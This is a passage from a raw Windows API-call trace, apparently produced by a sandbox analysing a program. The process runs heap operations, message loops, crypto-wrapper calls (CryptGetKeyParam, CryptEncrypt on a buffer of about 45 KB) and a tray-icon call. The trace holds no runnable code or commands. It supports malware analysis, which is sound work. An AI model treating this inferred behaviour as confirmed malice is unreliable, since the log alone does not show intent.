(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0193.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.698] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0193.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0193.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0193.698] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0193.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0193.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0193.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0193.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0193.698] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0193.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0193.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0193.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0193.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0193.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0193.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.699] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0193.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0193.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0193.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0193.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0193.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0193.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0193.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0193.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0193.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0193.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0193.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0193.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0193.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0193.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0193.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0193.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0193.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0193.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0193.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0193.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0193.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0193.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0193.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0193.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0193.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0193.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0193.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0193.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0193.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0193.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0193.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0193.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0193.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0193.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0193.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0193.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0193.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0193.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0193.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0193.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0193.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0193.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0193.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0193.702] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0193.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0193.703] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2668, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2668*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0193.703] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0193.703] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0193.703] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.703] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.703] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.703] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0193.703] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.703] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.703] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0193.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0193.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0193.703] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.703] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.703] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0193.704] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0193.704] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.704] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0193.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0193.704] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.704] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0193.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0193.704] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0193.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.704] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0193.704] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.706] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.706] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xb330, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xb340) returned 1 [0193.706] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.706] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0193.706] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.706] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.706] CharLowerBuffW (in: lpsz="byte[45889]", cchLength=0xb | out: lpsz="byte[45889]") returned 0xb [0193.706] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.709] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.709] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.709] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.709] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xb330, dwBufLen=0xb340 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xb340) returned 1 [0193.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0193.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.712] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.712] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.712] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.712] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0193.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0193.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0193.712] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.712] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0193.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0193.713] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.713] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0193.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0193.715] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.721] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.726] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0193.730] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0193.736] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0193.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0193.743] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.838] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.838] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0193.838] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 1 [0193.838] TranslateMessage (lpMsg=0x87f36c) returned 0 [0193.838] DispatchMessageW (lpMsg=0x87f36c) returned 0x0 [0193.838] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ea08) returned 1 [0193.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0193.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0193.839] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0193.839] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0193.839] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.844] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.844] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.844] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 